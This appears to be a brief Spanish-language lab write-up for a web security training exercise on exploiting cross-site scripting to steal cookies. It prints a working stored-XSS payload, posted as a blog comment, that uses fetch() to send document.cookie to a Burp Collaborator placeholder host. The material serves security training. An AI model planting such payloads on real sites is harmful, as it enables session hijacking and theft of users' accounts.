22 Lab: Exploiting cross-site scripting to steal cookies

Enviamos el siguiente payload en un comentario de blog, insertando su subdominio de Burp Collaborator donde se indica:

<script>
fetch('[https://BURP-COLLABORATOR-SUBDOMAIN](https://burp-collaborator-subdomain/)', {
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>

Previous09 Lab: Reflected XSS into a JavaScript string with angle brackets HTML encoded Next24 Lab: Exploiting XSS to bypass CSRF defenses

Last updated 1 year ago